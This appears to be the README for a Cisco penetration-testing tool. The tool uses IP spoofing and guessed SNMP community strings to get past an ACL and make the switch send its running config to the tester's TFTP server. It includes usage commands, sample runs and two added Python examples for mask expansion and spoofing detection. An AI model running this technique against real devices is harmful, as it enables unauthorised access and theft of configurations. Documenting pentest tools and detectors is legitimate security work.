
cisco-snmp-slap utilises IP address spoofing in order to bypass an ACL protecting an SNMP service on a Cisco IOS device.

Typically IP spoofing has limited use during real attacks outside DoS. A spoofed connection to a TCP service cannot complete the initial handshake. UDP packets are easier to spoof, but the return packet is often sent to the wrong address, which makes it difficult to collect any information returned.

However, if an attacker can guess the SNMP RW community string and a valid source address, they can set SNMP MIBs. One of the more obvious uses for this is to have a Cisco SNMP service send its IOS configuration file to another device.

This tool allows you to try one or more community strings against a Cisco device from one or more IP addresses. When specifying IP addresses you can choose to go through a range of source addresses sequentially or randomly.

To specify a range of source IP addresses to check, an initial source address and an IP mask are supplied. Any bits set in the IP mask will be used to generate source IP addresses by altering the initial source address.

For example, if a source address of is supplied with an IP mask of then the script will explore the address from to

The bits set do not have to be sequential like a subnet mask. For example the mask is valid and will explore the ranges 10.0,128.0-1.0-255.
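
The mask expansion described above, written out as an added example (not the tool's own code): the candidate set is every address obtained by varying the bits of the initial address that are set in the mask, which also lets a defender check whether a permitted management address falls inside a given range. The base `10.0.0.0` and mask `0.128.1.255` are constructed sample values, and the function names and enumeration order are assumptions.

```python
import ipaddress

def _to_int(addr):
    return int(ipaddress.IPv4Address(addr))

def expand_mask(base, mask):
    """Yield every IPv4 address made by varying the bits of `base` set in `mask`."""
    base_i, mask_i = _to_int(base), _to_int(mask)
    fixed = base_i & ~mask_i & 0xFFFFFFFF          # bits the mask leaves alone
    bits = [b for b in range(32) if (mask_i >> b) & 1]
    # Counting n upward and scattering its bits into the mask positions visits
    # each combination once (this order is an assumption, lowest bit first).
    for n in range(1 << len(bits)):
        addr = fixed
        for i, b in enumerate(bits):
            if (n >> i) & 1:
                addr |= 1 << b
        yield ipaddress.IPv4Address(addr)

def candidate_count(mask):
    """Number of source addresses a mask covers: 2 ** (number of set bits)."""
    return 1 << bin(_to_int(mask)).count("1")

def in_range(base, mask, addr):
    """True if `addr` differs from `base` only in bits that are set in `mask`."""
    differing = _to_int(base) ^ _to_int(addr)
    return (differing & ~_to_int(mask) & 0xFFFFFFFF) == 0

if __name__ == "__main__":
    base, mask = "10.0.0.0", "0.128.1.255"      # constructed sample values
    addrs = list(expand_mask(base, mask))
    print(candidate_count(mask), addrs[0], addrs[255], addrs[256], addrs[-1])
    print(in_range(base, mask, "10.128.1.7"), in_range(base, mask, "10.64.0.1"))
```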

When checking a range of IP addresses randomly or sequentially, the tool requires you to enter the path to the root of the TFTP directory. The script will check this directory to see if the file has been successfully transferred.

This tool was written to target Cisco layer 3 switches during pentests, though it may have other uses. It works well against these devices because:

  1. layer 3 switches rarely have reverse path verification configured in the author's experience
  2. there are no routers or other devices which may be able to detect that IP spoofing is occurring.

Though I hope that users will find other interesting uses for this script and its source code.


In this example I will take a simple IOS device with an access list protecting an SNMP service using the community string 'cisco':

access-list 10 permit
snmp-server community cisco rw 10

One IOS device's IP address is

The pentester has an IP address and has started a TFTP server.

If the tester knows all of this, they can use the one-shot single mode to grab the device's config file, e.g.:

./ single cisco

If the tester doesn't know the details of they could try and guess. Let's say the tester has done some recon and has figured out that all internal addresses are the range.

./ seqmask private /tftproot/

This command will search through all the /24; the tester hopes to save some time by assuming a whole subnet will be allowed access rather than just one IP address.

root@Athena:/home/notroot/cisco-snmp-slap# ./ seqmask cisco /tftproot/
Cisco SNMP Slap,  v0.3
Darren McDonald,

WARNING: No route found for IPv6 destination :: (no default route?)
Community String:   cisco
TFTP Server IP  :
Source IP:
Source Mask:
Destination IP:
TFTP Root Path:     /tftproot//cisco-config.txt
< ... cut for brevity ... >

You should notice that the program exits and announces success several IP addresses after it enters the range. This is because it is not possible to determine which source address was successful; the script only determines that one of the requests succeeded once the config file turns up in the tftproot. Given you've just nabbed the running config, you can now find out the details of the ACL yourself.

Rather than specifying a single community string, you can also give a list which should be used. The mode names are the same except that they have a '_l' suffix.

For example, to repeat the same attack using a list of community strings in list.txt, the following arguments should be used.

root@Athena:/home/notroot/cisco-snmp-slap# ./ seqmask_l list.txt /tftproot/
Cisco SNMP Slap,  v0.3
Darren McDonald,

WARNING: No route found for IPv6 destination :: (no default route?)
Community File: list.txt
TFTP Server IP  :
Source IP:
Source Mask:
Destination IP:
TFTP Root Path: /tftproot//cisco-config.txt
community strings loaded:  ['private\n', 'cisco\n', 'public\n'] /  private /  cisco /  public /  private /  cisco /  public /  private /  cisco /  public /  private /  cisco /  public

Now each IP address is checked with each community string in list.txt.
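
Seen from the monitoring side, the sweep shown above is SNMP traffic to one device from many source addresses in a short time. The following is an added detection example, not part of the tool: it assumes a sensor (for instance a port mirror on the management VLAN) that records the source MAC with each packet, and that the sending host does not also vary its MAC. The record layout, function names, thresholds and sample data are all constructed.

```python
from collections import defaultdict

SNMP_PORT = 161

def find_spoof_sweeps(records, window=60.0, min_sources=8):
    """Return {(src_mac, dst_ip): n} where a single MAC used n >= min_sources
    distinct source IPs towards dst_ip on UDP/161 within `window` seconds."""
    by_key = defaultdict(list)
    for ts, mac, src, dst, dport in records:
        if dport == SNMP_PORT:
            by_key[(mac, dst)].append((ts, src))
    alerts = {}
    for key, events in by_key.items():
        events.sort()
        start, best = 0, 0
        in_window = defaultdict(int)        # source IP -> packets in window
        for ts, src in events:
            in_window[src] += 1
            # Slide the window start forward, dropping expired packets.
            while ts - events[start][0] > window:
                old = events[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            best = max(best, len(in_window))
        if best >= min_sources:
            alerts[key] = best
    return alerts

def sample_records():
    """Constructed records: (time_s, src_mac, src_ip, dst_ip, dst_port)."""
    recs = []
    for i in range(10):                     # one NMS polling every 30 s
        recs.append((i * 30.0, "00:11:22:33:44:55",
                     "192.0.2.10", "192.0.2.1", 161))
    for i in range(20):                     # one MAC, 20 source IPs in 10 s
        recs.append((100.0 + i * 0.5, "66:77:88:99:aa:bb",
                     f"192.0.2.{100 + i}", "192.0.2.1", 161))
    recs.append((101.0, "66:77:88:99:aa:bb",  # non-SNMP traffic is ignored
                 "192.0.2.200", "192.0.2.1", 69))
    return recs

if __name__ == "__main__":
    print(find_spoof_sweeps(sample_records()))
```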


As programming languages go, Python is a simple language, easy to read and write, and I encourage you to attempt to debug and correct any issues you find and send me your changes so I can share them with other users on the NCC GitHub.

But if you need assistance you can contact me at I'll do my best to help you, but you should be aware I am not a full-time developer (which should be obvious from my code!) and may not immediately have time to get to your query.


  • 0.1 Initial version
  • 0.2 Added random and sequential modes and source address masks
  • 0.3 Added community string file list feature, first public version
  • 0.3.1 now uses os.sep so that paths work correctly on Windows

